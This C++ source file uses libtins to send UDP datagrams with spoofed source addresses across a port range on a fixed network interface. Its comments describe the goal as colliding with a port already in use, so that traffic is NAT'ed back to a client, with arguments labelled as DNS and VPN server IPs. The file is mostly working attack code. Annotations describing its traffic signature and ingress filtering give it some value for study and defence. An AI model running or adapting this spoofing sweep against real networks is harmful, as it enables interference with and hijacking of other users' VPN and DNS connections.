
  1. #include <tins/tins.h>
  2. #include <cassert>
  3. #include <iostream>
  4. #include <string>
  5. #include <unistd.h>
  6. #include <thread>
  7. #include <random>
  8. using std::thread;
  9. using std::cout;
  10. using std::string;
  11. using std::vector;
  12. using namespace Tins;
// Process-wide state. None of it is synchronised; the visible listing never
// starts a thread, so every access happens on the main thread.
bool is_running{true};   // cleared by main() right before it returns; not read in the visible listing
bool verbose{false};     // gates divider and progress output; main() forces it to true
bool count_resp{false};  // set by fill_ports() after a sweep; not read in the visible listing
string dest_ip{};        // filled from argv[3]; spread_uds()/fill_ports() take same-named parameters that shadow it
string server_ip{};      // filled from argv[1]; shadowed the same way inside spread_uds()
// Writes `count` divider lines to stdout, but only when the global `verbose`
// flag is set; with `verbose` off (or count <= 0) nothing is printed.
void print_divider(int count) {
    if (!verbose) {
        return;
    }
    for (int line = 0; line < count; ++line) {
        cout << "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n";
    }
}
// Returns `length` characters, each drawn uniformly from [0-9A-Za-z].
//
// Every call seeds a fresh std::mt19937 from std::random_device. mt19937 is a
// general-purpose PRNG, not a CSPRNG: its output is acceptable as filler
// bytes but must not be used for tokens, keys, nonces or anything else an
// adversary should be unable to predict.
std::string random_string(std::size_t length) {
    const std::string alphabet = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";

    std::random_device entropy;
    std::mt19937 engine(entropy());
    // Inclusive bounds: valid indices into `alphabet`.
    std::uniform_int_distribution<> pick(0, alphabet.size() - 1);

    std::string out;
    std::size_t produced = 0;
    while (produced < length) {
        out.push_back(alphabet[pick(engine)]);
        ++produced;
    }
    return out;
}
// Sends one UDP datagram per port across [start_port, end_port) on the
// hard-coded interface "enp0s9". Per the original author's note, the intent is
// to cover the target's port range with spoofed datagrams so that one of them
// matches a port already in use and is NAT'ed back to the client.
//
// Parameters:
//   server_spread - true: the destination port is the one being swept;
//                   false: the source port is the one being swept.
//   server_ip, server_port - the fixed endpoint of the flow.
//   dest_ip               - the other address placed in the IP header.
//   start_port, end_port  - swept range; end_port itself is NOT sent because
//                           the loop condition is `<`.
//
// Both IP addresses come straight from the caller, so the source address on
// the wire need not belong to this host.
// NOTE(review): assumes libtins' IP(dst, src) and UDP(dport, sport) argument
// order - confirm against the installed libtins version.
//
// Returns: always 1. The value is not a discovered port, although
// fill_ports() prints it as "possible port".
//
// Traffic profile for detection: ascending one-port-at-a-time UDP datagrams
// with every other header field held constant and ~1 us pacing. Nothing in
// this function attaches send_payload to pkt, so the datagrams sent here carry
// no payload. Source-address validation (ingress/egress filtering, BCP 38) on
// the sending network drops datagrams whose source address is not the
// sender's own.
int spread_uds(bool server_spread, string server_ip, int server_port, string dest_ip, int start_port, int end_port) {
    PacketSender sender;
    NetworkInterface iface("enp0s9");
    int i; // unused
    IP pkt;
    // Ports are `int` here; NOTE(review): presumably narrowed to 16 bits by the
    // UDP constructor, so out-of-range values would wrap silently - confirm.
    if (server_spread) pkt = IP(dest_ip, server_ip) / UDP(start_port, server_port);
    else pkt = IP(server_ip, dest_ip) / UDP(server_port, start_port);
    // Reference into pkt's own UDP layer: the port writes in the loop below
    // modify the packet that sender.send() transmits.
    UDP& udp = pkt.rfind_pdu<UDP>();
    int spoof_port = start_port;
    int send_size = 0;
    int send_count = 0; // unused
    // Generated here and regenerated each iteration, but never referenced again.
    string send_payload = random_string(send_size);
    cout << "spreading the port range from " << spoof_port << " to " << end_port << " with udps..\n";
    while (spoof_port < end_port) {
        if (server_spread) udp.dport(spoof_port); // server_spread: the destination port is the swept field
        else udp.sport(spoof_port);               // otherwise the source port is the swept field
        sender.send(pkt, iface);
        spoof_port++;
        send_size ++;
        send_payload = random_string(send_size);
        //cout << "next rando string: " << send_payload << "\n";
        // Wrap the size counter at 1000. The message below runs after the
        // increment, so it prints the NEXT port, not the one just sent.
        if (send_size >= 1000) {
            send_size = 0;
            cout << "Sent w size 1000 to " << spoof_port << "\n";
        }
        usleep(1); // 1 microsecond between sends
    }
    // print_divider() re-checks `verbose` itself; the outer test is redundant.
    if (verbose) print_divider(2);
    return 1;
}
// Runs exactly one sweep through spread_uds() and hands back its return value.
//
// Side effects: prints dividers and (when `verbose` is set) a progress line,
// and sets the global `count_resp` to true. There is no retry: the sweep is
// performed once per call.
//
// Returns whatever spread_uds() returned. The log line labels it a "possible
// port", but spread_uds() as written returns the constant 1.
int fill_ports(bool server_spread, string source_ip, int sport, string dest_ip, int start_port, int end_port) {
    const int swept = spread_uds(server_spread, source_ip, sport, dest_ip, start_port, end_port);

    print_divider(1);
    if (verbose) {
        cout << "finished phase 2 w possible port: " << swept << "\n";
    }
    count_resp = true;
    print_divider(2);

    return swept;
}
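// Entry point: parses the command line and runs a single sweep.
//
// Usage: <prog> server_ip server_port dest_ip start_port end_port [enable_server_spread]
// The mere presence of a seventh argument, whatever its text, enables
// server_spread.
//
// Returns 0 on a usage or argument error; otherwise the value returned by
// fill_ports(), which becomes the process exit status.
// NOTE(review): this is the reverse of the usual convention (0 = success);
// left unchanged because scripts calling this binary may depend on it.
int main(int argc, char** argv) {
    cout << "arc twas: " << argc;
    if (argc != 6 && argc != 7) {
        cout << "sike wrong number of args ---> (server_ip, server_port, dest_ip, start_port, end_port <enable_server_spread>)\n";
        return 0;
    }

    // Strict decimal parse. atoi() returned 0 for any non-numeric text and
    // accepted trailing garbage and out-of-range values, all of which then
    // flowed unchecked into 16-bit port fields.
    const auto parse_port = [](const char* text, long max_value, int& out) -> bool {
        if (text == nullptr || *text == '\0') {
            return false;
        }
        long value = 0;
        for (const char* p = text; *p != '\0'; ++p) {
            if (*p < '0' || *p > '9') {
                return false;
            }
            value = value * 10 + (*p - '0');
            if (value > max_value) {
                return false; // also bounds `value`, so it cannot overflow
            }
        }
        out = static_cast<int>(value);
        return true;
    };

    int server_port = 0;
    int start_port = 0;
    int end_port = 0;
    // end_port is an exclusive bound in spread_uds(), so 65536 is the value
    // that lets a range include port 65535.
    const bool ports_ok = parse_port(argv[2], 65535, server_port)
                       && parse_port(argv[4], 65535, start_port)
                       && parse_port(argv[5], 65536, end_port);
    if (!ports_ok) {
        cout << "ports must be decimal integers: server_port and start_port in 0-65535, end_port in 0-65536\n";
        return 0;
    }

    server_ip = argv[1]; // dns server IP
    dest_ip = argv[3];   // vpn server IP
    const bool server_spread = (argc == 7);
    verbose = true;

    print_divider(2);
    const int p = fill_ports(server_spread, server_ip, server_port, dest_ip, start_port, end_port);
    cout << p << "\n";
    print_divider(1);
    is_running = false;
    if (verbose) cout << "Filled up all those ports and finished at: " << p << "\n";
    return p;
}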